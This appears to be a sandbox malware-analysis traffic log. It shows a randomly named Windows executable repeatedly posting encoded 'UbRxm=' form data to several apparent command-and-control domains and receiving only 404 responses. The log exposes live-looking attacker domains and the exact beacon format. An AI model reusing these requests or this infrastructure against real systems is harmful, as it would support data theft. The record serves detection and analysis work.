Nov 25, 2024 13:56:04.779733896 CET | 776 | OUT | POST /dlkm/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Origin: http://www.kkpmoneysocial.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.kkpmoneysocial.top/dlkm/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=s6NQF012CocKUuTdlMB83K/qcOL4gUBZ3q/kb80XQso98b98LwFqdbUy2DLRjhEjezayv1cH1qofq5K0FXuDpS0IxagM8fSekEgThRgwFyI66PBYiXpcD+lZ9Ad7+S1znqMHnbsVoVPorbia+cgd6CaFgaGbxecHrQWkMfhSTLeVMUJCoizd8LxXA+beGmhuJ7KXE0k=
Nov 25, 2024 13:56:06.092663050 CET | 955 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=na0%2BdNc7Sz9PRExX9CV11b2lVgfDZypMcHE39JDjHs00WMsCXPXh3gy2FBK1ExDxREUVp9D0H%2BK9jhVKqKMMZ28%2BIA%2BB2i6mhWU1NeCUlgu92dO7g7%2Bw6BQeaZhQR9wI0Snv275hc8KK"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cbfbdd9432dc-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=776&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49717 | 172.67.129.38 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:56:07.445298910 CET | 796 | OUT | POST /dlkm/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Origin: http://www.kkpmoneysocial.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.kkpmoneysocial.top/dlkm/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=s6NQF012CocKVKvdns981q/1TuL4u0Bj3rDkb9wHRfM987t8ZExqR7Uy9jLU9RE0ezXFv0wH1sEfq8O0FkGAzi0O96gOhPSekEgThVwKFyw669VYi2pdfulWtQd70y13nqN9neEzoXnoreGa+NgCzCaHv6HN8sR+rQiVX8NTVKCtAC4oyA7b/LZ8A9zoDR8GTYanajyoIpwzAgcRSa1mHd8V8e+1
Nov 25, 2024 13:56:08.804627895 CET | 957 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqwxji09v79CJXsGDAyIFzRR7%2F6N31VQVfUsOHOtuiNT%2ByDw91RA0GRKOidrsFYT4Nq1DxZUrPZkHAe%2FpCS%2BpJKSD553%2B40k32s8ww49DkLH8nfqAYHgIr%2BfEMwSpsQtV63X78eCplpf"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cc0ccbe8c43b-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1488&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      3 | 192.168.2.8 | 49718 | 172.67.129.38 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:10.120735884 CET | 1813 | OUT | POST /dlkm/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Origin: http://www.kkpmoneysocial.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.kkpmoneysocial.top/dlkm/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:11.425204992 CET | 945 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:11 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onSbGqX3FivBa7fkhoyvrasE1koFyJmnMd7wldbYiBArGcAn7BTbCECDDaJhoF195ishCwaVpSksMH5yMmJ1G2IbD2eAfwPX6ajGx2r%2BPs3hCx1Eg0JgZaWrUXNvieLZ%2F4aDgJJBlpjW"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cc1d2f2143e3-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1813&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Nov 25, 2024 13:56:11.425954103 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.8 | 49719 | 172.67.129.38 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:12.810961962 CET | 516 | OUT | GET /dlkm/?UbRxm=h4lwGEVwdKAie/3i69ZS5ajdX7DevTN5l7rCLvUsWI5Ax6oJIVJyRtoh5SGHiRwIVgG3mVQ8/tYP0qqkAkm1lhwb/KkDwsT64i8O6GgUd051zcV49WQ+HPRS7BJ45XoE1w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.kkpmoneysocial.top
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:14.280613899 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGIQVYX6BGrB5WQUwYt2ob%2BmWuMLsKO5XNlcQm%2FhMq4tlAzAMMPB9J1vQZXDTgoFuw8i%2FuFlrGCyWHJiHPTNY6JCBJeYOu3vD%2FH9TYuHvq%2BTzoRnPqlt1P1WmDs3eUh5Tt5zMMJ2uKb6"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cc2e0edc0f4b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1694&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --
                                                                                      Nov 25, 2024 13:56:14.280642986 CET | 77 | IN | Data Raw: 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: >... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.8 | 49721 | 209.74.77.109 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:19.923913956 CET | 752 | OUT | POST /8uep/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.futuru.xyz
                                                                                      Origin: http://www.futuru.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.futuru.xyz/8uep/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:21.198311090 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:20 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.8 | 49723 | 209.74.77.109 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:22.584954023 CET | 772 | OUT | POST /8uep/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.futuru.xyz
                                                                                      Origin: http://www.futuru.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.futuru.xyz/8uep/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:23.837104082 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:23 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.8 | 49724 | 209.74.77.109 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:25.255928993 CET | 1789 | OUT | POST /8uep/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.futuru.xyz
                                                                                      Origin: http://www.futuru.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.futuru.xyz/8uep/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:26.511651039 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:26 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.8 | 49725 | 209.74.77.109 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:27.913479090 CET | 508 | OUT | GET /8uep/?UbRxm=c2pj5XzU4r8mroY+x9nXsVmXiRTTvEExFimN19zxWLYZcfwNZM3Ctl+xWcy7JvpSNCmS4f8+1JlLQGO0Hv+UiSuhGSb748cjOyYKQpOu9XZhhnIssQky4Xxuz1j9m1caEA==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.futuru.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:29.193669081 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:28 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.8 | 49726 | 38.181.21.85 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:34.899224043 CET | 749 | OUT | POST /bi55/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.yhj12.one
                                                                                      Origin: http://www.yhj12.one
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.yhj12.one/bi55/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=wX3KR9jsyH9Bh2bflkPK/ddOw1jGG73MJ13dkBYCmixlk4BAH0ST7uLbY141H931Ow/IUGJk320AYURQMiuFBzu0PIoiLmQawWpxbkDz/m4hZn9bar/MYhrzY1pHRwbb2a6K9Kw53ShKuwERMQa+YzqPZKq5Ktx6rzL+jcCE86v0ORexdrtFWPoadJFQ5xDAwQB5j0A=
                                                                                      Nov 25, 2024 13:56:36.455631018 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:56:36 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "6693a1e3-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      10 | 192.168.2.8 | 49727 | 38.181.21.85 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:37.575434923 CET | 769 | OUT | POST /bi55/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.yhj12.one
                                                                                      Origin: http://www.yhj12.one
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.yhj12.one/bi55/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=wX3KR9jsyH9BnXrfnH3K59dN/VjGMb3IJ0LdkAcSmWdlq9tAG1ST2OLbTV48Id3AOwj2UHFk32gAYWJQNV6CODuyWYogGGQawWpxbknZ/lIhZ3NbaK/PGRrwIlpHHwbf2a649O4T3RZKux0RMhaxRzqJUqrNOdgmtzeelNqQ3ojZCHvbHJlDVPAxdKtm8GeoqzRJ9jVrLyn5BghdlM2P9DHLogcx


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      11 | 192.168.2.8 | 49728 | 38.181.21.85 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:40.239509106 CET | 1786 | OUT | POST /bi55/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.yhj12.one
                                                                                      Origin: http://www.yhj12.one
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.yhj12.one/bi55/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm= [TRUNCATED]
                                                                                      Nov 25, 2024 13:56:41.800571918 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:56:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "6693a1e3-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      12 | 192.168.2.8 | 49729 | 38.181.21.85 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:42.892083883 CET | 507 | OUT | GET /bi55/?UbRxm=9VfqSJPbhh1HsXnTkF+U6adH/BnqBZbub0jDgAwJrnxzr9B3JVfn3uPZcB9gesjtADmpDWZfolEsGVNmGAi6MiyGQ6YANno90wBnX2TfwVwXOUx5FI/nfHL1eW4WOSittQ==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yhj12.one
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:44.480930090 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:56:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "6693a1e3-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      13 | 192.168.2.8 | 49730 | 195.110.124.133 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:50.475522995 CET | 785 | OUT | POST /te2d/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Origin: http://www.officinadelpasso.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.officinadelpasso.shop/te2d/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=VTDLrq+jeP07kX4tfVmy9GHkk/yPaMjG5A4IhFla8DE0ZE9jc8ZHUCsIZyeEOVHAd2JVBpineHgSFfif0B9+M1nanelf4tiCOPNrgV5XGcFSl0X3oG1rli8uOdjC6ePaj1sIa8F0hlKMlr9UUJ/pRSHJV5kAsI58JGmkErmAVhehu6Ni6SbcyCwA6NrFSzfu9goZGX0=
                                                                                      Nov 25, 2024 13:56:51.740436077 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:51 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      14 | 192.168.2.8 | 49731 | 195.110.124.133 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:53.280829906 CET | 805 | OUT | POST /te2d/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Origin: http://www.officinadelpasso.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.officinadelpasso.shop/te2d/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=VTDLrq+jeP07n1stTSyyqWHnvfyPQsja5AEIhEgf8Ws0ZgxjG5tHVCsIBieFD1H1d2EqBpuneH0SFfSf0yF9PFnU5+lR2NiCOPNrgVt9GcdS5Vn3rn1o7y8tetjCrOPWj1s+a9JOhnCMluBUVbXuYSHPLJl5vLYWB0iwFbmPaXTeis8IgwTaxCYr6ODzXECGnD4pYAgGs5ql3cPOfEXGOYCbGQwL
                                                                                      Nov 25, 2024 13:56:54.623528004 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:54 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
